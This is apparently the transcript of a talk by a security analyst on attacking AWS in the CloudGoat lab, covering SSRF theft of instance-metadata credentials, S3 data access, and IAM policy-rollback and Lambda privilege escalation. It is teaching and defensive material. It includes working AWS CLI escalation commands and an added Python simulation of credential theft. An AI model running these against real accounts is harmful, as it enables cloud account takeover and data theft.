Understanding AWS cloud attacks

Enterprises are increasingly running their IT and application infrastructure natively in the cloud.

Regardless of whether you are a cloud security enthusiast or a pentester, it is important that you are able to assess the security of the cloud platform and pentest these cloud-native deployments to help secure organizations. This session will help you get started and understand the different attacks that are possible on a target AWS environment.

You will learn how to discover vulnerabilities and what attacks are possible on AWS that leverage AWS IAM, SSRF, Lambda, S3, etc.

Kavisha Sheth

August 01, 2021

Transcript

  1. Understanding AWS attacks using CloudGoat. Kavisha Sheth

  2. About me. Kavisha Sheth
    • Security Analyst at Appsecco
    • Breaks web application, API and cloud security
    • Member of a number of security communities including null community, InfoSecGirls, and WiCyS India
    • Listed as one of the top security researchers of the nation in a newsletter of NCIIPC RVDP
  3. Agenda
    • AWS real world attacks
    • Attacking AWS infra using keys obtained via SSRF
    • Enumerating and attacking AWS S3 storage
    • Privilege escalation within AWS using IAM policy rollback
    • Privilege escalation using Lambda functions
    • Next steps in learning
    • Tools
    • References
  4. Why are we doing this?
    • Enterprises are increasingly running their IT and application infrastructure natively in the cloud
    • Multiple cloud assessments have shown misconfiguration to be a major security concern
    • A lot of default code and deployment practices on the Internet do not take security into account
    • Shared responsibility between the cloud provider and you can be confusing
    • If you are aware of what attacks are out there, you can defend yourself better
  5. What am I covering today
    • Attacking AWS infra using keys obtained via SSRF
    • Enumerating and attacking AWS S3 storage
    • Privilege escalation within AWS using IAM policy rollback
    • Privilege escalation using Lambda functions
  6. Target Environment
    • To understand the attacks in today's talk we will be using CloudGoat as our target environment
    • You can set up CloudGoat to practice these attacks by following the instructions from our reference slide
  7. Attacking AWS infra using keys obtained via SSRF

  8. 1. Discovery of AWS IAM keys in client-side source code

  9. 2. Identify the user using AWS STS

  10. 3. Enumerate permissions for solus user

  11. 4. List Lambda functions: hard-coded AWS security credentials in the environment variables of the Lambda function
  12. 5. Identify who the credentials belong to

  13. 6. Permission enumeration for IAM user "wrex": EC2 operations access

  14. 7. What EC2 instances are running?

  15. 8. Describe EC2 instance: public IP address of the EC2 instance
  16. 9. Web application running on port 80

  17. 10. Added string value to URL parameter

  18. Web application vulnerable to SSRF

  20. 11. Steal the IAM role credentials

  21. 12. Enumerate permissions

  22. 13. List the buckets and download any data stored in the S3 buckets
  23. Approach so far!! What was our approach?
    • Found credentials with read-only access
    • The application hosted on the EC2 instance was vulnerable to SSRF
    • A role was attached to the EC2 instance
    • Exploited the SSRF to steal the IAM role credentials
    • Looked for permissions
    • Found S3-related permissions
    • Listed the S3 buckets and downloaded data
  24. Attacker flow so far!!

  25. What's next?
    • Is the web application hosted on an EC2 instance?
    • Is a role attached to the EC2 instance?
  26. Post exploitation of SSRF

  27. Finding SSRF via HTML Injection inside a PDF file on AWS EC2 https://blog.appsecco.com/finding-ssrf-via-html-injection-inside-a-pdf-file-on-aws-ec2-214cc5ec5d90
  28. AWS S3 Data breach

  29. Scenario Assumptions
    • Attacker has discovered a public IP with an HTTP reverse proxy running
    • The reverse proxy is misconfigured (it does not check the target IP)
    • This reverse proxy allows access to any internal IP address, including the instance metadata endpoint
  30. 1. Crafted cURL command

  31. 2. Role credentials retrieved

  32. 3. Configure a profile using the stolen credentials

  33. 4. Enumerate permissions. Command: python enumerate-iam.py --access-key ACCESS-ID --secret-key SECRET-KEY --session-token SESSION-TOKEN
  34. 5. Get access to S3 bucket data

  35. Approach https://github.com/RhinoSecurityLabs/cloudgoat/blob/master/scenarios/cloud_breach_s3/README.md
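The credential-theft step that both the SSRF chain (slides 7 to 27) and the reverse-proxy scenario (slides 29 to 35) rely on is the same: an attacker-controlled GET request reaches the instance metadata service and reads the role credentials. The following is an added example, not code from the deck or from CloudGoat: it runs a local stand-in for the metadata service and shows why a GET-only SSRF or open proxy succeeds against IMDSv1 but fails once IMDSv2 session tokens are required (the legitimate two-step flow still works). The role name, credential values and port are constructed; only the metadata paths and the two IMDSv2 header names are real.

```python
"""Added example: local IMDSv1/IMDSv2 stand-in plus the attacker's GET-only fetch."""
import json
import secrets
import threading
import urllib.error
import urllib.request
from http.server import BaseHTTPRequestHandler, HTTPServer

ROLE_NAME = "cg-banking-WAF-Role"        # hypothetical role name
FAKE_CREDS = {                            # constructed, not real credentials
    "AccessKeyId": "ASIAEXAMPLE000000000",
    "SecretAccessKey": "example-secret",
    "Token": "example-session-token",
}
CRED_PATH = "/latest/meta-data/iam/security-credentials/"   # real IMDS path
TOKEN_PATH = "/latest/api/token"                            # real IMDSv2 path
TOKEN_TTL_HEADER = "X-aws-ec2-metadata-token-ttl-seconds"   # real IMDSv2 header
TOKEN_HEADER = "X-aws-ec2-metadata-token"                   # real IMDSv2 header


class FakeIMDS(BaseHTTPRequestHandler):
    """Serves the credential path; with require_token=True it behaves like IMDSv2."""
    require_token = False
    tokens = set()

    def log_message(self, *args):  # keep the demo quiet
        pass

    def _send(self, code, body):
        data = body.encode()
        self.send_response(code)
        self.send_header("Content-Length", str(len(data)))
        self.end_headers()
        self.wfile.write(data)

    def do_PUT(self):
        # IMDSv2: a PUT with a TTL header mints a session token
        if self.path == TOKEN_PATH and self.headers.get(TOKEN_TTL_HEADER):
            tok = secrets.token_hex(16)
            self.tokens.add(tok)
            self._send(200, tok)
        else:
            self._send(400, "bad request")

    def do_GET(self):
        # IMDSv2 refuses any GET that does not carry a valid session token
        if self.require_token and self.headers.get(TOKEN_HEADER) not in self.tokens:
            self._send(401, "unauthorized")
            return
        if self.path == CRED_PATH:
            self._send(200, ROLE_NAME)
        elif self.path == CRED_PATH + ROLE_NAME:
            self._send(200, json.dumps(FAKE_CREDS))
        else:
            self._send(404, "not found")


def start_fake_imds(require_token):
    FakeIMDS.require_token = require_token
    srv = HTTPServer(("127.0.0.1", 0), FakeIMDS)  # random free port
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv


def ssrf_get(base, path):
    """What a vanilla SSRF or open reverse proxy gives the attacker: a plain GET."""
    try:
        with urllib.request.urlopen(base + path, timeout=2) as r:
            return r.status, r.read().decode()
    except urllib.error.HTTPError as e:
        return e.code, ""


def steal_role_creds(base):
    """Slide 20 / slide 31: list the role name, then fetch that role's credentials."""
    code, role = ssrf_get(base, CRED_PATH)
    if code != 200:
        return None
    code, body = ssrf_get(base, CRED_PATH + role.strip())
    return json.loads(body) if code == 200 else None


def imdsv2_fetch(base):
    """Legitimate IMDSv2 flow: PUT for a token, then GET with the token header.
    A GET-only SSRF can do neither, which is what blocks it."""
    req = urllib.request.Request(base + TOKEN_PATH, method="PUT",
                                 headers={TOKEN_TTL_HEADER: "21600"})
    with urllib.request.urlopen(req, timeout=2) as r:
        token = r.read().decode()
    req = urllib.request.Request(base + CRED_PATH + ROLE_NAME,
                                 headers={TOKEN_HEADER: token})
    with urllib.request.urlopen(req, timeout=2) as r:
        return json.loads(r.read().decode())


def demo(require_token, fetcher=steal_role_creds):
    """Run fetcher against a fresh fake IMDS; returns the credentials or None."""
    srv = start_fake_imds(require_token)
    try:
        return fetcher(f"http://127.0.0.1:{srv.server_port}")
    finally:
        srv.shutdown()
        srv.server_close()


if __name__ == "__main__":
    print("IMDSv1, GET-only attacker:", demo(False))
    print("IMDSv2, GET-only attacker:", demo(True))
    print("IMDSv2, legitimate client:", demo(True, imdsv2_fetch))
```

Against a real instance the attacker's two GETs are the ones the deck issues through the vulnerable URL parameter or, in the cloud_breach_s3 scenario, through the open reverse proxy pointed at 169.254.169.254. Note that IMDSv2 only closes this path when the instance is set to require tokens; an instance with both versions enabled still answers the plain GET.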

  36. Where can you find S3 buckets?
    • HTTP responses when uploading a file
    • In DNS records
    • Google searches for the website name and S3 buckets
    • Shodan, Certificate Transparency logs, Censys, numerous bucket finder scripts, GrayHat Warfare bucket search
  37. Privilege escalation within AWS using IAM policy rollback

  38. Scenario Assumptions
    • Credentials already found by the attacker (through JS source, GitHub, server-side code disclosure, etc.)
  39. Credentials Found

  40. 1. Identify/verify who the security credentials belong to

  41. 2. Review and enumerate policy versions

  42. 3. Enumerate Policy versions

  43. 4. Policy with admin privileges – version 3

  44. 5. Make version v3 the default policy version. Command to make v3 the default policy version:
    aws iam set-default-policy-version --policy-arn "arn:aws:iam::ACCOUNT-ID:policy/cg-raynor-policy" --version-id v3 --profile <PROFILE-NAME>
    Let's create a new IAM user!
  45. Tool to detect this vulnerability automatically https://github.com/RhinoSecurityLabs/Security-Research/blob/master/tools/aws-pentest-tools/aws_escalate.py

  46. Privilege escalation using lambda functions

  47. Scenario Assumptions
    • Credentials already found by the attacker (through JS source, GitHub, server-side code disclosure, etc.)
  48. 1. List users and policies

  49. 2. List Roles

  50. 3. Verifying access control

  51. 4. Try to assume the lambdaManager role

  52. 5. Attach the administrator policy to the IAM user "Chris"

  53. 6. Leverage the lambdaManager role to perform a privilege escalation using a Lambda function
    • Create the Lambda function: aws lambda create-function --function-name admin_function --runtime python3.6 --role <cg-debug-role arn> --handler code.lambda_handler --zip-file fileb://code.zip --profile lambdaManager
    • Invoke the Lambda function: aws lambda invoke --function-name admin_function out.txt --profile lambdaManager
  54. 7. Chris got full admin access

  55. Approach

  56. Some AWS vulnerability detection tools
    • Scout Suite
    • Prowler
    • Bucket finder
    • Enumerate IAM
    • iam_user_enum
  57. Things to note
    • Reconnaissance and OSINT are the key to discovering the security issues in cloud services and applications
    • To reduce the risk associated with a successful SSRF on AWS, administrators can move EC2 instances to IMDSv2 and require session tokens; IMDSv2 protects EC2 instances against vanilla SSRF attempts, but only when IMDSv1 is actually disabled on the instance
    • Make sure that EC2 instances are configured properly
    • The most common themes are misconfiguration of services, insecure programming and permissions that should not have been given
    • Post exploitation has no limits in the cloud: you can attack additional services, disrupt logging, or make code changes to attack users
    • There are a ton of tools that security folks have written on GitHub and a lot of work is being done in the attack and exploitation areas
  58. References
    • https://github.com/RhinoSecurityLabs/Security-Research/tree/master/tools/aws-pentest-tools/iam_user_enum
    • https://github.com/appsecco/attacking-cloudgoat2
    • https://blog.appsecco.com/server-side-request-forgery-ssrf-and-aws-ec2-instances-after-instance-meta-data-service-version-38fc1ba1a28a
    • https://blog.appsecco.com/getting-shell-and-data-access-in-aws-by-chaining-vulnerabilities-7630fa57c7ed
    • https://github.com/RhinoSecurityLabs/cloudgoat/tree/master/scenarios
    • https://github.com/toniblyx/prowler
    • https://github.com/nccgroup/ScoutSuite
    • https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html
  59. Kavisha Sheth, Security Analyst. https://linkedin.com/in/kavisha-sheth/ https://twitter.com/sheth_kavisha